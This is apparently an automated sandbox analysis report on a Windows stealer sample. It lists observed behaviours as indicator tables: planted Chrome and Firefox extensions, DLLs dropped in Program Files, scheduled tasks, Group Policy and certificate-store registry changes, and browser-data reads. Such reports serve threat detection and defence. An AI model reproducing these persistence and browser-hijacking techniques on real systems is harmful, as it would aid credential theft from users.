Malware Analysis Report

2024-11-30 02:49

Sample ID: 240407-wlhxfsag47

Target: 75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f

SHA256: 75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f

Tags: discovery, spyware, stealer

Score: 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 8/10

SHA256: 75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f

Threat Level: Likely malicious

The file 75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f was found to be: Likely malicious.

Malicious Activity Summary

Tags: discovery, spyware, stealer

Blocklisted process makes network request

Checks BIOS information in registry

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Drops desktop.ini file(s)

Checks installed software on the system

Drops Chrome extension

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-04-07 18:00

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-04-07 18:00

Reported: 2024-04-07 18:03

Platform: win10v2004-20240226-en

Max time kernel: 126s

Max time network: 127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A

Reads user/profile data of web browsers (tags: spyware, stealer)

Checks installed software on the system (tags: discovery)

Drops Chrome extension

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Program Files (x86)\ycfBUKIjHxeOC\AUIHvKh.xml | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Program Files (x86)\YrliKKkuhgWU2\bdedluftlGzRk.dll | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Program Files (x86)\ycfBUKIjHxeOC\ZEsyLeB.dll | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Program Files (x86)\orRvbnhdU\ddutGR.dll | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\yMucUOn.xml | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Program Files (x86)\orRvbnhdU\CAwHQVp.xml | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Program Files (x86)\YrliKKkuhgWU2\Sxxhlmi.xml | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\vwnNFpw.dll | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Program Files (x86)\IgAQuzzvNCUn\msmreRo.dll | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job | C:\Windows\SysWOW64\schtasks.exe | N/A
File created | C:\Windows\Tasks\aUYdFpynDtMaquqaO.job | C:\Windows\SysWOW64\schtasks.exe | N/A
File created | C:\Windows\Tasks\yozVwwMRZiDXbVH.job | C:\Windows\SysWOW64\schtasks.exe | N/A
File created | C:\Windows\Tasks\YGcJOiVocZfwUgdee.job | C:\Windows\SysWOW64\schtasks.exe | N/A

Enumerates physical storage devices

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" | C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fb412698-0000-0000-0000-d01200000000} | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
